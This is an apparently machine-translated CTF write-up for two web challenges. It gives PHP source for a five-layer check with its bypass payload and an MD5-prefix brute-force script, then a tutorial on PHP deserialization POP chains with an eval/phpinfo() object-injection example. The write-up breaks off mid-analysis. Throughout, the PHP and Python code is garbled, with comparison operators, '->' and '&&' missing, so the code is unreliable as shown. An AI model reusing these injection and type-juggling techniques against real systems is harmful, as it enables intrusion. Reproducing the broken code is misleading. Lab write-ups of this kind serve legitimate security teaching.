Web

1.[Strong Net Pioneer] Treasure Hunt

Distribute the competition questions, and the access link is as follows:

This question requires you to obtain two Key values through information 1 and information 2, enter Key1 and Key2 and then decrypt.

Key1's code audit

Click "Information 1" and find that it is code audit:

The complete source code is as follows:

?php

header('Content-type:text/html;charset=utf-8');

error_reporting(0);

highlight_file(__file__);

function filter($string){

$filter_word=array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,'\,'\,'\','\','\','0000000');

$filter_phrase='/'.implode('|',$filter_word).'/';

return preg_replace($filter_phrase,'',$string);

}

if($ppp){

unset($ppp);

}

$ppp['number1']='1';

$ppp['number2']='1';

$ppp['nunber3']='1';

$ppp['number4']='1';

$ppp['number5']='1';

extract($_POST);

$num1=filter($ppp['number1']);

$num2=filter($ppp['number2']);

$num3=filter($ppp['number3']);

$num4=filter($ppp['number4']);

$num5=filter($ppp['number5']);

if(isset($num1) is_numeric($num1)){

die('non-number');

}

else{

if($num1 1024){

echo 'first floor';

if(isset($num2) strlen($num2)=4 intval($num2 + 1) 500000){

echo 'Second Level';

if(isset($num3) '4bf21cd'===substr(md5($num3),0,7)){

echo 'third floor';

if(!($num4 0)($num4==0)($num4=0)(strlen($num4) 6)(strlen($num4) 8)isset($num4) ){

echo 'Fourth Floor';

if(!isset($num5)||(strlen($num5)==0)) die('no');

$b=json_decode(@$num5);

if($y=$b===NULL){

if($y===true){

echo 'Fifth Floor';

include 'KeY1lhv.php';

echo $KEY1;

}

}else{

die('no');

}

}else{

die('no');

}

}else{

die('no');

}

}else{

die('no');

}

}else{

die('no111');

}

}

Non-digital

?

The core code that requires bypass is as follows:

The first layer: requires non-pure numbers and are greater than 1024, and use PHP weak comparison to make $num1=11111a.

The second layer: bypass the intval function (the intval() function is used to obtain the integer value of a variable), and use scientific and technological methods to bypass the limit of length less than 5, so just let $num2=9e9.

The third layer: substr(md5) takes the value as a certain value, write a script to perform MD5 collision, calculates that num3 is 61823470, and the script is as follows:

import hashlib

def md5_encode(num3):

return hashlib.md5(num3.encode()).hexdigest()[0:7]

for i in range(60000000,70000000):

num3=md5_encode(str(i))

# print(num3)

if num3=='4bf21cd':

print(i)

break

The operation results are as follows:

Layer 4: Scientific notation bypass, length is 7 and 0, num4 is 0e00000.

Layer 5: The json_decode() function accepts a JSON-encoded string and converts it into a PHP variable. If json cannot be decoded (in the non-json format), it will return null, so num5 is equal to 1a (any string is enough).

Therefore, the final Payload:

ppp[number1]=11111appp[number2]=9e9ppp[number3]=61823470ppp[number4]=0e00000ppp[number5]=1a

POST submission gets Key1:

KEY1{e1e1d3d40573127e9ee0480caf1283d6}

Key2's script search

1. The prompt message gives a download link:

2. After decompression, you get a bunch of docx files:

3. When you open any one, you will find that it is a bunch of characters:

4. Guess Key2 is in one of the files, and write a script to run:

import os

import docx

for i in range(1,20):

for j in range(1,20):

path='./5.{0}/VR_{1}'.format(i,j)

files=os.listdir(path)

# print(filePath)

for file in files:

try:

fileName=path+'/'+file

# print(fileName)

file=docx.Document(fileName)

for content in file.paragraphs:

# print(content.text)

if 'KEY2{' in content.text:

print(content.text)

print(fileName)

break

except:

pass

The operation results are as follows:

Get KEY2:

KEY2{T5fo0Od618l91SlG6l1l42l3a3ao1nblfsS}

Submit to get flag on the original page:

2.[Strong Net Pioneer] Gambler

issue the competition questions, the access address is as follows

Combined with the source code reminder of the question, use dirsearch to scan the directory and found that www.zip3. Decompress to obtain the source code of the question: meta charset='utf-8'?php//hint is in hint.phperror_reporting(1);

class Start{ public $name='guest'; public $flag='syst3m('cat 127.0.0.1/etc/hint');'; public function __construct(){ echo 'I think you need /etc/hint . Before this you need to see the source code'; }

public function _sayhello(){ echo $this-name; return 'ok'; }

public function __wakeup(){ echo 'hi'; $this-_sayhello(); } public function __get($cc){ echo 'give you flag : '.$this-flag; return ; }}

class Info{ private $phonenumber=123123; public $promise='I do'; public function __construct(){ $this-promise='I will not !'; return $this-promise; }

public function __toString(){ return $this-file['filename']-ffiillee['ffiilleennaammee']; }}

class Room{ public $filename='/flag'; public $sth_to_set; public $a=''; public function __get($name){ $function=$this-a; return $function(); } public function Get_hint($file){ $hint=base64_encode(file_get_contents($file)); echo $hint; return ; }

public function __invoke(){ $content=$this-Get_hint($this-filename); echo $content; }}

if(isset($_GET['hello'])){ unserialize($_GET['hello']);}else{ $hi=new Start();}? Seeing this, I guess it is a question for PHP deserialization, but the related questions I have learned before are only involved in the utilization points of destructors. This question was confused, so I immediately made up for the routine of PHP deserialization in CTF. PHP Magic Method The definition of magic method in PHP is to call the method that starts with two underscores __ the magic method. The common ones are as follows: __construct: Initialize the object when creating an object, which is generally used to assign initial values to variables. __destruct: is opposite to the constructor and is executed after the function where the object is located is called. __toString: Called when the object is used as a string. __sleep: Call this method before serializing the object (it returns an array required)__wakeup: Call this method before deserializing the recovery object__call: This method is automatically called when a method that does not exist in the object is called. __get: Reading data from inaccessible properties triggers __isset(): Calling isset() or empty() on inaccessible properties triggers __unset(): Triggering when using unset() on inaccessible properties __invoke(): Triggering when calling an object as a function For more information, please see the PHP manual: https://www.php.net/manual/zh/language.oop5.magic.php Simple example?phpclass A{ var $test='demo'; function __wakeup(){ eval($this-test); }}$a=$_GET['test'];$a_unser=unserialize($a);Analysis: There is only one Class A here, only one __wakeup() method, and once deserialized, it will follow the magic method __wakeup and execute the command of the test variable. Then we construct the following EXP to execute the phpinfo() function:phpclass A{ var $test='demo'; function __wakeup(){ echo $this-test; }}$a=$_GET['test'];$a_unser=unserialize($a);

$b=new A();$b-test='phpinfo();';$c=serialize($b);echo $c;Output: O:1:'A':1:{s:4:'test';s:10:'phpinfo();';} Submit the output Payload, the execution effect is as follows

A further look at an advanced question in POP chain example:php//flag is in flag.phperror_reporting(1);class Read { public $var; public function file_get($value) { $text=base64_encode(file_get_contents($value)); return $text; } public function __invoke(){ $content=$this-file_get($this-var); echo $content; }}

class Show{ public $source; public $str; public function __construct($file='index.php') { $this-source=$file; echo $this-source.'Welcome'.'br'; } public function __toString() { return $this-str['str']-source; }

public function _show() { if(preg_match('/gopher|http|ftp|https|dict|\.\.|flag|file/i',$this-source)) { die('hacker'); } else { highlight_file($this-source); } }

public function __wakeup() { if(preg_match('/gopher|http|file|ftp|https|dict|\.\./i', $this-source)) { echo 'hacker'; $this-source='index.php'; } }}

class Test{ public $p; public function __construct() { $this-p=array(); }

public function __get($key) { $function=$this-p; return $function(); }}

if(isset($_GET['hello'])){ unserialize($_GET['hello']);}else{ $show=new Show('pop3.php'); $show-_show();}[Title Analysis] For this question, we can see that our purpose is to read the flag.php file by constructing deserialization. The Read class has the file_get_contents() function, and the Show class has the highlight_file() function to read the file. Next, when looking for the target point, you can see that the unserialize function exists in the last few lines. The execution of this function will also trigger the __wakeup magic method, and the __wakeup magic method can be seen in the Show class. 1. __wakeup method: public function __wakeup(){ if(preg_match('/gopher|http|file|ftp|https|dict|\.\./i', $this-source)) { echo 'hacker'; $this-source='index.php'; }} There is a regular matching function preg_match(). The second parameter of the function should be a string. Here the source is used as a string to match. At this time, if this source is an object of a certain class, the __tostring method of this class will be triggered. After reading the code throughout, it will find that the __tostring magic method is also in the Show class. Then